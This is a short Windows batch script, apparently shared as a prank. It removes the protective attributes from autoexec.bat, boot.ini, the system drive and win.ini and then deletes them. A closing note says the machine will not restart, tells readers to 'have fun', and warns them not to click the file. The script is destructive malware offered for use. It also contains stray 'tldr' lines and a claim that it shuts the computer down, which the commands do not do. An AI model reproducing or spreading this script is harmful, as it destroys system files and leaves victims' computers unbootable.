@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
This should shut down the computer on which the file will be executed. It shuts it off once and deletes the files needed to reboot and restart. Have fun …njoy!!
REMEMBER – DO NOT CLICK THIS FILE. YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!